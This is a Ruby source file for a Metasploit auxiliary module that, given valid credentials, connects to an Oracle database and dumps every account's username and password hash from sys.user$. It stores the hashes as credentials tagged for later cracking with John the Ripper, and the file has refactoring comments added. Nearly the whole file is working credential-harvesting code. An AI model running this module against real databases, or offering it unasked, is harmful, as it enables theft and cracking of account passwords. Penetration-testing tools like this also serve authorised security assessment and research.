
oracle_hashdump.rb 3.6KB

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Loads the framework core, which provides Msf::Auxiliary and the
# Msf::Exploit::ORACLE / Msf::Auxiliary::Report / Scanner mixins used below.
require 'msf/core'
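class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Oracle Password Hashdump',
      'Description' => %Q{
        This module dumps the usernames and password hashes
        from Oracle given the proper Credentials and SID.
        These are then stored as creds for later cracking.
      },
      'Author'      => ['theLightCosine'],
      'License'     => MSF_LICENSE
    )
  end

  # Scanner entry point, invoked once per target host.
  #
  # Detects the server release (11g keeps SHA-1 based hashes in
  # sys.user$.spare4, earlier releases keep DES hashes in
  # sys.user$.password), collects the username/hash pairs into a table,
  # prints the table and passes it to report_hashes for storage.
  #
  # @param ip [String] address of the host being scanned
  # @return [void]
  def run_host(ip)
    return unless check_dependencies

    ver = prepare_exec('select * from v$version')
    if ver.nil?
      print_error("An Error has occured, check your OPTIONS")
      return
    end

    # NOTE(review): only the literal '11g' is recognised; every other release
    # string (including newer ones) takes the DES / password-column path.
    is_11g = !ver.empty? && ver[0].include?('11g')
    print_status("Server is running 11g, using newer methods...") if is_11g

    this_service = report_service(
      :host  => datastore['RHOST'],
      :port  => datastore['RPORT'],
      :name  => 'oracle',
      :proto => 'tcp'
    )

    tbl = Rex::Text::Table.new(
      'Header'  => 'Oracle Server Hashes',
      'Indent'  => 1,
      'Columns' => ['Username', 'Hash']
    )

    begin
      results = prepare_exec(hash_query(is_11g))
      # prepare_exec signals failure with nil (see the version probe above);
      # calling #empty? on it would only surface as a misleading privilege error.
      if results.nil?
        print_error("An Error has occured, check your OPTIONS")
        return
      end
      # Each result line is assumed to be "name,hash". Rows carry exactly the
      # two declared columns; the former extra 'No' cell on the 11g path was
      # never read by report_hashes and did not match the column layout.
      results.each do |result|
        tbl << result.split(/,/)
      end
    rescue => e
      print_error("An error occured. The supplied credentials may not have proper privs")
      # Detail only in verbose mode so the operator can tell a privilege
      # problem from a parsing or connectivity failure.
      vprint_error("#{e.class}: #{e.message}")
      return
    end

    print_status("Hash table :\n #{tbl}")
    report_hashes(tbl, is_11g, ip, this_service)
  end

  # Stores every row of +table+ as a non-replayable hash credential with an
  # UNTRIED login bound to +service+.
  #
  # @param table [Rex::Text::Table] rows of [username, hash]
  # @param is_11g [Boolean] selects the John the Ripper format tag
  # @param ip [String] host address, resolved via Rex::Socket.getaddress
  # @param service [Hash] record from report_service (:port, :proto, :name)
  # @return [void]
  def report_hashes(table, is_11g, ip, service)
    # The jtr_format tag is what lets later cracking tell DES (pre-11g)
    # hashes apart from SHA-1 (11g) hashes.
    jtr_format = is_11g ? "raw-sha1" : "des"

    service_data = {
      address: Rex::Socket.getaddress(ip),
      port: service[:port],
      protocol: service[:proto],
      service_name: service[:name],
      workspace_id: myworkspace_id
    }

    table.rows.each do |username, hash_value|
      credential_data = {
        origin_type: :service,
        module_fullname: fullname,
        username: username,
        private_data: hash_value,
        private_type: :nonreplayable_hash,
        jtr_format: jtr_format
      }
      credential_core = create_credential(credential_data.merge(service_data))

      login_data = {
        core: credential_core,
        status: Metasploit::Model::Login::Status::UNTRIED
      }
      create_credential_login(login_data.merge(service_data))
    end
    print_status("Hash Table has been saved")
  end

  private

  # Builds the hash-dump query for the detected release. The hash column name
  # is chosen internally (never from user-supplied data), so the interpolation
  # cannot introduce injectable input; the resulting SQL is identical to the
  # two literal queries the module previously used.
  #
  # @param is_11g [Boolean] true when the server reported itself as 11g
  # @return [String] SQL selecting "name,hash" for every account with a stored password
  def hash_query(is_11g)
    hash_column = is_11g ? 'spare4' : 'password'
    "SELECT name, #{hash_column} FROM sys.user$ where password is not null and name<> 'ANONYMOUS'"
  end
end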